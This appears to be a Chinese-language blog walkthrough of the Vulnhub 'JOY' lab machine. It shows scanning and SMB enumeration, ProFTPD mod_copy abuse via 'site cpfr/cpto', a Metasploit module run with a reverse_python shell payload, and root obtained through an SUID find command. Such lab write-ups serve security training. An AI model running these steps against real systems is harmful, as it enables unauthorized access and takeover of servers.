Vulnhub:Digitalworld.local (JOY)靶机

发布时间 2023-04-14 17:45:40作者: ctostm

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

image

使用enum4linux枚举目标smb服务,发现两个系统用户

enum4linux -a 192.168.111.130

image

ftp可以匿名登陆,目录权限属主和树组都是ftp用户,猜测:访问的是ftp用户的家目录

image

upload目录中的directory文件内容,图中文件和目录权限version_control可能会有有用 的信息

image

漏洞利用

搜索proftpd漏洞

searchsploit proftpd

image

image

复制version_control文件到/home/ftp/upload目录

site cpfr /home/patrick/version_control
site cpto /home/ftp/upload/version_control

image

version_control文件内容

image

msf模块exploit/unix/ftp/proftpd_modcopy_exec拿shell

use exploit/unix/ftp/proftpd_modcopy_exec
set rhosts 192.168.111.130
set sitepath /var/www/tryingharderisjoy
set payload cmd/unix/reverse_python
run

image

提权

在/var/www/tryingharderisjoy/ossec/patricksecretsofjoy文件中发现用户patrick的密码:apollo098765

image

patrick用户sudo权限

image

执行/home/patrick/script/test该文件可以以root身份赋权限,给find命令suid权限,提升为root

find . -exec /bin/bash -p \; -quit

image